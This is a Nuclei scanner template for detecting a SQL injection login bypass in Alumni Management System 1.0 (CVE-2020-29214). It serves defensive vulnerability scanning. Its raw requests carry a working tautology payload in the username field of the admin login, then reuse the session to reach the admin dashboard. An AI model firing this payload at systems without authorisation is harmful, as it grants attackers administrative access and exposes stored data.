nuclei-templates/vulnerabilities/other/alumni-management-sqli.yaml

52 lines
1.4 KiB
YAML

id: alumni-management-sqli
info:
name: Alumni Management System 1.0 - SQL Injection
author: arafatansari
severity: critical
description: |
Alumni Management System 1.0 contains a SQL injection vulnerability via admin/login in the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.exploit-db.com/exploits/48883
- https://nvd.nist.gov/vuln/detail/CVE-2020-29214
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
tags: sqli,auth-bypass,cms,edb,alumni
requests:
- raw:
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin'+or+'1'%3D'1'%23&password=nuclei
- |
GET /admin/index.php?page=home HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Welcome back Admin!'
- 'Alumni List'
condition: and
- type: word
part: body
words:
- '#login-form'
negative: true
- type: status
status:
- 200
# Enhanced by md on 2022/09/28